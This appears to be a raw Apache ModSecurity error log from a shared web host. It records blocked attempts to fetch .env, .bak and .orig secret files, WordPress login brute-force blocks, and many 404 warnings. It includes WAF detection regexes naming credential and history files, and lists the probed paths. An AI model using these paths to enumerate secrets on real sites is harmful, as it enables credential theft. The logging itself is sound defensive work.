[Tue May 26 19:53:36.894481 2026] [security2:error] [pid 86490:tid 86747] [client 185.177.72.53:39962] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.orig$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1266"] [id "390584"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .orig)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/settings.py.orig"] [unique_id "ahWs6FZMwN0DpLVWo6KpFgAAAQQ"]
[Tue May 26 19:53:36.901786 2026] [security2:error] [pid 86490:tid 86613] [remote 31.24.44.107:39052] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 107.44.24.31.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWs6FZMwN0DpLVWo6KpEAAAu3o"]
[Tue May 26 19:53:36.973151 2026] [security2:error] [pid 86490:tid 86510] [remote 74.91.224.220:38740] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 220.224.91.74.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWs6FZMwN0DpLVWo6KpFwAAmBM"], referer: https://freshmindsolutions.com/wp-login.php
[Tue May 26 19:53:37.083790 2026] [security2:error] [pid 86490:tid 86657] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs6FZMwN0DpLVWo6Ko6wAAAKo"]
[Tue May 26 19:53:37.088746 2026] [security2:error] [pid 86490:tid 86624] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs6FZMwN0DpLVWo6KpDQAAAIk"]
[Tue May 26 19:53:37.088942 2026] [security2:error] [pid 86490:tid 86630] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs6FZMwN0DpLVWo6Ko5wAAAI8"]
[Tue May 26 19:53:37.707738 2026] [security2:error] [pid 86490:tid 86709] [client 185.177.72.53:39962] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/resources/.env"] [unique_id "ahWs6VZMwN0DpLVWo6KpLgAAAN4"]
[Tue May 26 19:53:38.563686 2026] [security2:error] [pid 86490:tid 86617] [remote 78.142.18.172:59158] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 172.18.142.78.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWs6lZMwN0DpLVWo6KpQQAA-X4"]
[Tue May 26 19:53:38.609953 2026] [security2:error] [pid 86490:tid 86692] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs6lZMwN0DpLVWo6KpXgAAAM0"]
[Tue May 26 19:53:38.678411 2026] [security2:error] [pid 86490:tid 86703] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs6lZMwN0DpLVWo6KpawAAANg"]
[Tue May 26 19:53:38.680933 2026] [security2:error] [pid 86490:tid 86642] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs6lZMwN0DpLVWo6KpmgAAAJs"]
[Tue May 26 19:53:38.707080 2026] [security2:error] [pid 86490:tid 86714] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs6lZMwN0DpLVWo6KpewAAAOM"]
[Tue May 26 19:53:38.712535 2026] [security2:error] [pid 86490:tid 86652] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs6lZMwN0DpLVWo6KpkQAAAKU"]
[Tue May 26 19:53:38.723093 2026] [security2:error] [pid 86490:tid 86740] [client 185.177.72.53:4966] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/config/private/env.bak"] [unique_id "ahWs6lZMwN0DpLVWo6KpxwAAAP0"]
[Tue May 26 19:53:38.727162 2026] [security2:error] [pid 86490:tid 86665] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs6lZMwN0DpLVWo6KplwAAALI"]
[Tue May 26 19:53:38.727824 2026] [security2:error] [pid 86490:tid 86622] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs6lZMwN0DpLVWo6KplAAAAIc"]
[Tue May 26 19:53:38.730798 2026] [security2:error] [pid 86490:tid 86632] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs6lZMwN0DpLVWo6KpmAAAAJE"]
[Tue May 26 19:53:38.733776 2026] [security2:error] [pid 86490:tid 86653] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs6lZMwN0DpLVWo6KpsQAAAKY"]
[Tue May 26 19:53:38.737972 2026] [security2:error] [pid 86490:tid 86677] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs6lZMwN0DpLVWo6KpdwAAAL4"]
[Tue May 26 19:53:38.739928 2026] [security2:error] [pid 86490:tid 86625] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs6lZMwN0DpLVWo6KpqwAAAIo"]
[Tue May 26 19:53:38.748550 2026] [security2:error] [pid 86490:tid 86638] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs6lZMwN0DpLVWo6KpnQAAAJc"]
[Tue May 26 19:53:38.750784 2026] [security2:error] [pid 86490:tid 86660] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs6lZMwN0DpLVWo6KpuAAAAK0"]
[Tue May 26 19:53:38.756203 2026] [security2:error] [pid 86490:tid 86649] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs6lZMwN0DpLVWo6KplQAAAKI"]
[Tue May 26 19:53:38.764037 2026] [security2:error] [pid 86490:tid 86674] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs6lZMwN0DpLVWo6KpoAAAALs"]
[Tue May 26 19:53:38.766363 2026] [security2:error] [pid 86490:tid 86707] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs6lZMwN0DpLVWo6KppAAAANw"]
[Tue May 26 19:53:38.766371 2026] [security2:error] [pid 86490:tid 86685] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs6lZMwN0DpLVWo6KpqAAAAMY"]
[Tue May 26 19:53:38.766893 2026] [security2:error] [pid 86490:tid 86621] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs6lZMwN0DpLVWo6KpuQAAAIY"]
[Tue May 26 19:53:38.770506 2026] [security2:error] [pid 86490:tid 86732] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs6lZMwN0DpLVWo6KpwwAAAPU"]
[Tue May 26 19:53:38.770803 2026] [security2:error] [pid 86490:tid 86636] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs6lZMwN0DpLVWo6KpvAAAAJU"]
[Tue May 26 19:53:38.773357 2026] [security2:error] [pid 86490:tid 86735] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs6lZMwN0DpLVWo6KpwAAAAPg"]
[Tue May 26 19:53:38.784924 2026] [security2:error] [pid 86490:tid 86716] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs6lZMwN0DpLVWo6KprgAAAOU"]
[Tue May 26 19:53:38.787323 2026] [security2:error] [pid 86490:tid 86618] [remote 78.142.18.172:59158] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 172.18.142.78.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWs6lZMwN0DpLVWo6KpyAAA4n8"], referer: https://freshmindsolutions.com/wp-login.php
[Tue May 26 19:53:38.789691 2026] [security2:error] [pid 86490:tid 86683] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs6lZMwN0DpLVWo6KpsAAAAMQ"]
[Tue May 26 19:53:38.793303 2026] [security2:error] [pid 86490:tid 86633] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs6lZMwN0DpLVWo6KpxAAAAJI"]
[Tue May 26 19:53:38.922985 2026] [security2:error] [pid 86490:tid 86691] [client 57.141.2.17:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWs6lZMwN0DpLVWo6KpUQAAAMw"]
[Tue May 26 19:53:39.002488 2026] [security2:error] [pid 86490:tid 86682] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs6lZMwN0DpLVWo6Kp1AAAAMM"]
[Tue May 26 19:53:39.008206 2026] [security2:error] [pid 86490:tid 86733] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs6lZMwN0DpLVWo6Kp0gAAAPY"]
[Tue May 26 19:53:39.022422 2026] [security2:error] [pid 86490:tid 86623] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs6lZMwN0DpLVWo6Kp2QAAAIg"]
[Tue May 26 19:53:39.182370 2026] [security2:error] [pid 86490:tid 86694] [client 74.7.228.48:38658] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "303"] [hostname "www.empresas.moneyapp.com.co"] [uri "/index.php"] [unique_id "ahWs6lZMwN0DpLVWo6KpVQAAzxI"]
[Tue May 26 19:53:39.420235 2026] [security2:error] [pid 86490:tid 86675] [client 74.7.228.48:38658] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "www.empresas.moneyapp.com.co"] [uri "/index.php"] [unique_id "ahWs61ZMwN0DpLVWo6Kp5QAAvBs"], referer: https://www.empresas.moneyapp.com.co/robots.txt
[Tue May 26 19:53:39.573345 2026] [security2:error] [pid 86490:tid 86728] [client 185.177.72.53:4966] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/flask-app/client/.env"] [unique_id "ahWs61ZMwN0DpLVWo6Kp8AAAAPE"]
[Tue May 26 19:53:39.611451 2026] [core:crit] [pid 86490:tid 86733] (13)Permission denied: [client 40.77.167.35:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 19:53:40.059025 2026] [security2:error] [pid 86490:tid 86665] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs61ZMwN0DpLVWo6KqDwAAALI"]
[Tue May 26 19:53:40.064265 2026] [security2:error] [pid 86490:tid 86741] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs61ZMwN0DpLVWo6KqEAAAAP4"]
[Tue May 26 19:53:40.073528 2026] [security2:error] [pid 86490:tid 86676] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs61ZMwN0DpLVWo6KqDQAAAL0"]
[Tue May 26 19:53:40.082647 2026] [security2:error] [pid 86490:tid 86653] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs61ZMwN0DpLVWo6KqEwAAAKY"]
[Tue May 26 19:53:40.084091 2026] [security2:error] [pid 86490:tid 86735] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs61ZMwN0DpLVWo6KqDgAAAPg"]
[Tue May 26 19:53:40.094918 2026] [security2:error] [pid 86490:tid 86679] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs7FZMwN0DpLVWo6KqGAAAAMA"]
[Tue May 26 19:53:40.108666 2026] [security2:error] [pid 86490:tid 86719] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs61ZMwN0DpLVWo6KqCgAAAOg"]
[Tue May 26 19:53:40.125060 2026] [security2:error] [pid 86490:tid 86669] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs7FZMwN0DpLVWo6KqGgAAALY"]
[Tue May 26 19:53:40.146531 2026] [security2:error] [pid 86490:tid 86723] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs7FZMwN0DpLVWo6KqMQAAAOw"]
[Tue May 26 19:53:40.148378 2026] [http2:info] [pid 93576:tid 93576] h2_workers: created with min=128 max=192 idle_ms=600000
[Tue May 26 19:53:40.153119 2026] [security2:error] [pid 86490:tid 86625] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs7FZMwN0DpLVWo6KqJwAAAIo"]
[Tue May 26 19:53:40.158142 2026] [security2:error] [pid 86490:tid 86706] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs7FZMwN0DpLVWo6KqKgAAANs"]
[Tue May 26 19:53:40.165808 2026] [security2:error] [pid 86490:tid 86709] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs7FZMwN0DpLVWo6KqJAAAAN4"]
[Tue May 26 19:53:40.168091 2026] [security2:error] [pid 86490:tid 86654] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs7FZMwN0DpLVWo6KqLgAAAKc"]
[Tue May 26 19:53:40.176023 2026] [security2:error] [pid 86490:tid 86733] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs7FZMwN0DpLVWo6KqJQAAAPY"]
[Tue May 26 19:53:40.177678 2026] [security2:error] [pid 86490:tid 86710] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs7FZMwN0DpLVWo6KqMAAAAN8"]
[Tue May 26 19:53:40.202665 2026] [security2:error] [pid 86490:tid 86703] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs7FZMwN0DpLVWo6KqQAAAANg"]
[Tue May 26 19:53:40.228757 2026] [security2:error] [pid 86490:tid 86649] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs7FZMwN0DpLVWo6KqXAAAAKI"]
[Tue May 26 19:53:40.238864 2026] [security2:error] [pid 86490:tid 86734] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs7FZMwN0DpLVWo6KqPwAAAPc"]
[Tue May 26 19:53:40.245995 2026] [security2:error] [pid 86490:tid 86622] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs7FZMwN0DpLVWo6KqPQAAAIc"]
[Tue May 26 19:53:40.247178 2026] [security2:error] [pid 86490:tid 86637] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs7FZMwN0DpLVWo6KqSQAAAJY"]
[Tue May 26 19:53:40.254780 2026] [security2:error] [pid 86490:tid 86700] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs7FZMwN0DpLVWo6KqVwAAANU"]
[Tue May 26 19:53:40.262240 2026] [security2:error] [pid 86490:tid 86735] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs7FZMwN0DpLVWo6KqVAAAAPg"]
[Tue May 26 19:53:40.265278 2026] [security2:error] [pid 86490:tid 86741] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs7FZMwN0DpLVWo6KqQgAAAP4"]
[Tue May 26 19:53:40.269994 2026] [security2:error] [pid 86490:tid 86673] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs7FZMwN0DpLVWo6KqVQAAALo"]
[Tue May 26 19:53:40.275706 2026] [security2:error] [pid 93576:tid 93739] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs7GDRMqfxdEDkoszKHgAAABs"]
[Tue May 26 19:53:40.278468 2026] [security2:error] [pid 86490:tid 86653] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs7FZMwN0DpLVWo6KqVgAAAKY"]
